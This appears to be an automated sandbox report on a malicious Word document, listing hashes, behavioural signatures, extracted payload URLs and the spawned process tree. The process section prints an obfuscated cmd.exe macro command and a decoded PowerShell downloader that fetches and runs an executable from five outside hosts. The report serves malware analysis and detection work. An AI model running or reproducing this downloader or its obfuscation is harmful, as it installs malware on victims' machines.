Analysis
-
max time kernel
131s -
max time network
148s -
platform
windows10-2004_x64 -
resource
win10v2004-20240419-en -
resource tags
arch:x64arch:x86image:win10v2004-20240419-enlocale:en-usos:windows10-2004-x64system -
submitted
06-05-2024 00:34
Static task
static1
Behavioral task
behavioral1
Sample
19ebd314b039cce609724b9e42a9257f_JaffaCakes118.doc
Resource
win7-20240220-en
Behavioral task
behavioral2
Sample
19ebd314b039cce609724b9e42a9257f_JaffaCakes118.doc
Resource
win10v2004-20240419-en
General
-
Target
19ebd314b039cce609724b9e42a9257f_JaffaCakes118.doc
-
Size
238KB
-
MD5
19ebd314b039cce609724b9e42a9257f
-
SHA1
2238cc692817a82f557ee4b9731658e9c9154b18
-
SHA256
df4776a1720feb2cdd8fcc4a91b298854bea7a86e172485cc64c318e4cbad89a
-
SHA512
77f63e04b9600a4a915ce5728e32739c7a39cab5e303ff6472115a00ce57a773b6238fb02f0c6f251fb3dd8a5ece4a38031b41898f4ab6fc04af7acd7e77b3e3
-
SSDEEP
3072:7Ttrd7SmTEFDGcmFsRGXtHjVJ/UjL/xSu90OoiLuDKZXfwKeljR1X:7TtrdGmU6sA9HRJ/ixUOmD+XfwLD
Malware Config
Extracted
http://tolanimusic.com/FgGLYFx2fxkRLqu_ns1avpR1Z
http://techfactory.pk/d0vjo7vRJw26C_G3JYE01qG
http://wozup.org/xhcaRjfp3m4KS_HnX
http://bentom.ru/1Bl14v64v9_POmBW662
http://13r.lg.ua/IsvJO35t6kj
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 3692 1936 cmd.exe 82 -
Blocklisted process makes network request 4 IoCs
flow pid Process 37 3972 powershell.exe 39 3972 powershell.exe 47 3972 powershell.exe 51 3972 powershell.exe -
An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
pid Process 3692 cmd.exe 3768 cmd.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 1936 WINWORD.EXE 1936 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 3972 powershell.exe 3972 powershell.exe 3972 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3972 powershell.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
pid Process 1936 WINWORD.EXE 1936 WINWORD.EXE 1936 WINWORD.EXE 1936 WINWORD.EXE 1936 WINWORD.EXE 1936 WINWORD.EXE 1936 WINWORD.EXE -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 1936 wrote to memory of 3692 1936 WINWORD.EXE 87 PID 1936 wrote to memory of 3692 1936 WINWORD.EXE 87 PID 3692 wrote to memory of 3768 3692 cmd.exe 89 PID 3692 wrote to memory of 3768 3692 cmd.exe 89 PID 3768 wrote to memory of 2212 3768 cmd.exe 99 PID 3768 wrote to memory of 2212 3768 cmd.exe 99 PID 3768 wrote to memory of 3928 3768 cmd.exe 100 PID 3768 wrote to memory of 3928 3768 cmd.exe 100 PID 3928 wrote to memory of 1728 3928 cmd.exe 101 PID 3928 wrote to memory of 1728 3928 cmd.exe 101 PID 1728 wrote to memory of 3596 1728 cmd.exe 102 PID 1728 wrote to memory of 3596 1728 cmd.exe 102 PID 1728 wrote to memory of 4676 1728 cmd.exe 103 PID 1728 wrote to memory of 4676 1728 cmd.exe 103 PID 3928 wrote to memory of 2732 3928 cmd.exe 104 PID 3928 wrote to memory of 2732 3928 cmd.exe 104 PID 2732 wrote to memory of 3972 2732 cmd.exe 105 PID 2732 wrote to memory of 3972 2732 cmd.exe 105
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\19ebd314b039cce609724b9e42a9257f_JaffaCakes118.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1936 -
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V/C"set hJgH=5NmRJatXg6\%o,Bzd$q.F(sDE2;:SxZ)_fU-9/c'e=}uLjWTl+@IykK~Pw73b{i4n0Ypv1CHrGhM AO&&for %8 in (67,12,57,11,56,34,14,44,51,70,27,55,0,13,69,11,72,11,28,24,28,28,51,78,1,1,77,75,24,27,55,35,63,13,69,11,74,11,47,24,75,56,27,55,35,59,13,69,11,48,48,76,17,64,6,2,43,41,39,45,2,6,60,39,26,17,15,72,15,33,41,64,40,57,35,12,60,45,40,38,6,76,1,40,6,19,46,40,60,70,48,62,40,64,6,26,17,33,12,57,67,53,41,39,74,6,6,67,27,37,37,6,12,48,5,64,62,2,43,22,62,38,19,38,12,2,37,20,8,73,44,66,20,29,25,33,29,53,3,44,18,43,32,64,22,69,5,68,67,3,69,30,50,74,6,6,67,27,37,37,6,40,38,74,33,5,38,6,12,72,52,19,67,53,37,16,65,68,45,12,58,68,3,4,57,25,9,70,32,73,59,4,66,24,65,69,18,73,50,74,6,6,67,27,37,37,57,12,15,43,67,19,12,72,8,37,29,74,38,5,3,45,33,67,59,2,63,54,28,32,71,64,7,50,74,6,6,67,27,37,37,60,40,64,6,12,2,19,72,43,37,69,14,48,69,63,68,9,63,68,36,32,56,78,2,14,46,9,9,25,50,74,6,6,67,27,37,37,69,59,72,19,48,8,19,43,5,37,51,22,68,4,78,59,0,6,9,53,45,39,19,28,67,48,62,6,21,39,50,39,31,26,17,64,18,38,33,41,39,62,2,67,74,45,39,26,17,15,22,57,67,57,76,41,76,39,9,25,65,39,26,17,33,6,2,67,41,39,62,43,15,60,48,39,26,17,38,12,60,74,41,17,40,64,68,27,6,40,2,67,49,39,10,39,49,17,15,22,57,67,57,49,39,19,40,29,40,39,26,33,12,72,40,5,38,74,21,17,68,57,72,57,15,76,62,64,76,17,33,12,57,67,53,31,61,6,72,52,61,17,15,72,15,33,19,23,12,57,64,48,12,5,16,20,62,48,40,21,17,68,57,72,57,15,13,76,17,38,12,60,74,31,26,17,12,12,57,62,2,41,39,48,33,57,64,39,26,51,33,76,21,21,73,40,6,35,51,6,40,2,76,17,38,12,60,74,31,19,48,40,64,8,6,74,76,35,8,40,76,63,65,65,65,65,31,76,61,51,64,68,12,53,40,35,51,6,40,2,76,17,38,12,60,74,26,17,12,6,2,33,53,41,39,6,16,2,5,39,26,60,72,40,5,53,26,42,42,38,5,6,38,74,61,42,42,17,48,57,6,18,5,41,39,15,6,57,72,57,39,26,86)do set loL=!loL!!hJgH:~%8,1!&&if %8 equ 86 echo !loL:*loL!=!|FOR /F "delims=G=Yf tokens=2" %B IN ('assoc^^^|findstr mdfi')DO %B "2⤵
- Process spawned unexpected child process
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
PID:3692 -
C:\Windows\system32\cmd.exeCmD /V/C"set hJgH=5NmRJatXg6\%o,Bzd$q.F(sDE2;:SxZ)_fU-9/c'e=}uLjWTl+@IykK~Pw73b{i4n0Ypv1CHrGhM AO&&for %8 in (67,12,57,11,56,34,14,44,51,70,27,55,0,13,69,11,72,11,28,24,28,28,51,78,1,1,77,75,24,27,55,35,63,13,69,11,74,11,47,24,75,56,27,55,35,59,13,69,11,48,48,76,17,64,6,2,43,41,39,45,2,6,60,39,26,17,15,72,15,33,41,64,40,57,35,12,60,45,40,38,6,76,1,40,6,19,46,40,60,70,48,62,40,64,6,26,17,33,12,57,67,53,41,39,74,6,6,67,27,37,37,6,12,48,5,64,62,2,43,22,62,38,19,38,12,2,37,20,8,73,44,66,20,29,25,33,29,53,3,44,18,43,32,64,22,69,5,68,67,3,69,30,50,74,6,6,67,27,37,37,6,40,38,74,33,5,38,6,12,72,52,19,67,53,37,16,65,68,45,12,58,68,3,4,57,25,9,70,32,73,59,4,66,24,65,69,18,73,50,74,6,6,67,27,37,37,57,12,15,43,67,19,12,72,8,37,29,74,38,5,3,45,33,67,59,2,63,54,28,32,71,64,7,50,74,6,6,67,27,37,37,60,40,64,6,12,2,19,72,43,37,69,14,48,69,63,68,9,63,68,36,32,56,78,2,14,46,9,9,25,50,74,6,6,67,27,37,37,69,59,72,19,48,8,19,43,5,37,51,22,68,4,78,59,0,6,9,53,45,39,19,28,67,48,62,6,21,39,50,39,31,26,17,64,18,38,33,41,39,62,2,67,74,45,39,26,17,15,22,57,67,57,76,41,76,39,9,25,65,39,26,17,33,6,2,67,41,39,62,43,15,60,48,39,26,17,38,12,60,74,41,17,40,64,68,27,6,40,2,67,49,39,10,39,49,17,15,22,57,67,57,49,39,19,40,29,40,39,26,33,12,72,40,5,38,74,21,17,68,57,72,57,15,76,62,64,76,17,33,12,57,67,53,31,61,6,72,52,61,17,15,72,15,33,19,23,12,57,64,48,12,5,16,20,62,48,40,21,17,68,57,72,57,15,13,76,17,38,12,60,74,31,26,17,12,12,57,62,2,41,39,48,33,57,64,39,26,51,33,76,21,21,73,40,6,35,51,6,40,2,76,17,38,12,60,74,31,19,48,40,64,8,6,74,76,35,8,40,76,63,65,65,65,65,31,76,61,51,64,68,12,53,40,35,51,6,40,2,76,17,38,12,60,74,26,17,12,6,2,33,53,41,39,6,16,2,5,39,26,60,72,40,5,53,26,42,42,38,5,6,38,74,61,42,42,17,48,57,6,18,5,41,39,15,6,57,72,57,39,26,86)do set loL=!loL!!hJgH:~%8,1!&&if %8 equ 86 echo !loL:*loL!=!|FOR /F "delims=G=Yf tokens=2" %B IN ('assoc^^^|findstr mdfi')DO %B "3⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
PID:3768 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $ntmu='jmtb';$zrzf=new-object Net.WebClient;$fowpk='http://tolanimusic.com/FgGLYFx2fxkRLqu_ns1avpR1Z@http://techfactory.pk/d0vjo7vRJw26C_G3JYE01qG@http://wozup.org/xhcaRjfp3m4KS_HnX@http://bentom.ru/1Bl14v64v9_POmBW662@http://13r.lg.ua/IsvJO35t6kj'.Split('@');$nqcf='imphj';$zswpw = '620';$ftmp='iuzbl';$cobh=$env:temp+'\'+$zswpw+'.exe';foreach($vwrwz in $fowpk){try{$zrzf.DownloadFile($vwrwz, $cobh);$oowim='lfwn';If ((Get-Item $cobh).length -ge 40000) {Invoke-Item $cobh;$otmfk='tdma';break;}}catch{}}$lwtqa='ztwrw';"4⤵PID:2212
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" FOR /F "delims=G=Yf tokens=2" %B IN ('assoc^|findstr mdfi') DO %B "4⤵
- Suspicious use of WriteProcessMemory
PID:3928 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c assoc|findstr mdfi5⤵
- Suspicious use of WriteProcessMemory
PID:1728 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" assoc"6⤵PID:3596
-
-
C:\Windows\system32\findstr.exefindstr mdfi6⤵PID:4676
-
-
-
C:\Windows\system32\cmd.execmd5⤵
- Suspicious use of WriteProcessMemory
PID:2732 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell $ntmu='jmtb';$zrzf=new-object Net.WebClient;$fowpk='http://tolanimusic.com/FgGLYFx2fxkRLqu_ns1avpR1Z@http://techfactory.pk/d0vjo7vRJw26C_G3JYE01qG@http://wozup.org/xhcaRjfp3m4KS_HnX@http://bentom.ru/1Bl14v64v9_POmBW662@http://13r.lg.ua/IsvJO35t6kj'.Split('@');$nqcf='imphj';$zswpw = '620';$ftmp='iuzbl';$cobh=$env:temp+'\'+$zswpw+'.exe';foreach($vwrwz in $fowpk){try{$zrzf.DownloadFile($vwrwz, $cobh);$oowim='lfwn';If ((Get-Item $cobh).length -ge 40000) {Invoke-Item $cobh;$otmfk='tdma';break;}}catch{}}$lwtqa='ztwrw';6⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3972
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
69KB
MD51d89f76e31a48db4d54184f7f7d81751
SHA1833ae6f1cdbdbf1d809fdad9e99909c478202412
SHA256db9d128de1a50e81afaba8bcc2a720e0d5d5026780acf7b62ead930ffe412473
SHA512056f9fbfae7c43ef99db793420dc32f4a35e4fa41dfeeecaef1db8a163bb20c2bf82368587f7a287187c73ca999ae045c4fa262f594e9781a7c12d2829c6d0eb
-
Filesize
245KB
MD5f883b260a8d67082ea895c14bf56dd56
SHA17954565c1f243d46ad3b1e2f1baf3281451fc14b
SHA256ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353
SHA512d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82